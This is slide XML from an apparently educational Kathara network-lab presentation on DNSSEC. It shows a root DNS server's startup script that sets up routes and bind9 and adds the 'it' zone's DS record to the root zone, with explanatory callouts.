              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
            <a:effectLst>
              <a:outerShdw dist="107763" dir="2700000" algn="ctr" rotWithShape="0">
                <a:schemeClr val="bg2"/>
              </a:outerShdw>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none"/>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endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>ip</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> address add 10.0.3.5/24 dev eth0</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>ip</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> route add 110.0.0.0/24 via 10.0.3.1</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>ip</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> route add 210.0.3.0/24 via 10.0.3.1</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>ip</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> route add 100.0.75.0/24 via 10.0.3.1</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>ip</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> route add 200.1.1.0/24 via 10.0.3.2</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>ip</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> route add 195.0.10.0/24 via 10.0.3.2</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>mkdir</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> -p /var/cache/bind/keys</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>chown</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> -R </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>bind:bind</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> /var/cache/bind</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>chown</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> -R </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>bind:bind</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> /</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>etc</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/bind</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>chmod</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> -R 775 /var/cache/bind</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>systemctl</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> start bind9</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>(</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>  while ! dig @10.0.3.10 it DNSKEY | grep -q "257 3 13"; do sleep 2; done</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>  echo "" &gt;&gt; /</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>etc</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/bind/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>db.root</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>  dig @10.0.3.10 it DNSKEY | </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>dnssec-dsfromkey</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> -f - it &gt;&gt; /</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>etc</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/bind/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>db.root</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>  sed -</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>i</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> 's/2024120401/2024120402/' /</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>etc</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/bind/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>db.root</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>  </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>rndc</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> reload .</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>) &amp;</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1600" b="1" noProof="0" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="AutoShape 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6357E8F7-543B-4831-B579-C95CC2A1E142}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="171" y="3294"/>
              <a:ext cx="2705" cy="143"/>
            </a:xfrm>
            <a:prstGeom prst="foldedCorner">
              <a:avLst>
                <a:gd name="adj" fmla="val 8278"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:ln w="19050">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:round/>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r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>d</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" noProof="0" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>nsroot.startup</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1600" b="1" noProof="0" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14340" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{37227AB7-4588-4299-B7FB-51546CF94B3A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>a quick look at the lab</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Segnaposto data 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8D4569B3-830D-A292-2184-04A46DC078F0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>last update: Feb 2026</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="Segnaposto piè di pagina 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9FCAFA48-DC6B-2A91-0D46-72469AA42C99}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>kathara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – [ lab: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dnssec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="AutoShape 195">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5D7E93C4-D268-0E89-2330-87D8B6F488F8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8217099" y="2858984"/>
            <a:ext cx="3830316" cy="917369"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -58873"/>
              <a:gd name="adj2" fmla="val 145799"/>
              <a:gd name="adj3" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effec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dirty="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>queries the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>dnsit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> server (10.0.3.10) asking for its public keys (DNSKEY) for the it zone</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0">
              <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="AutoShape 195">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{492A64D5-95E1-79E3-2A20-13B9B67BCC62}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6825960" y="5155887"/>
            <a:ext cx="3830316" cy="627396"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -112509"/>
              <a:gd name="adj2" fmla="val -63714"/>
              <a:gd name="adj3" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effec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dirty="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>adds a blank line to the end of the root zone file</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0">
              <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="343374550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175DB7-C501-F7DE-365D-00D5283F8708}"/>
            </a:ext>
          </a:extLst>
        </p:cNvPr>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="Group 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{84D2E35D-A25E-0C5B-1EF3-3ABC7AFBA426}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="609600" y="1314750"/>
            <a:ext cx="11159820" cy="4938154"/>
            <a:chOff x="126" y="3294"/>
            <a:chExt cx="9028" cy="1739"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="AutoShape 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{890A8480-49FD-A6D9-D57D-BAA3AFF12AEB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="126" y="3352"/>
              <a:ext cx="9028" cy="1681"/>
            </a:xfrm>
            <a:prstGeom prst="foldedCorner">
              <a:avLst>
                <a:gd name="adj" fmla="val 8278"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:ln w="19050">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
            <a:effectLst>
              <a:outerShdw dist="107763" dir="2700000" algn="ctr" rotWithShape="0">
                <a:schemeClr val="bg2"/>
              </a:outerShdw>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none"/>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endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
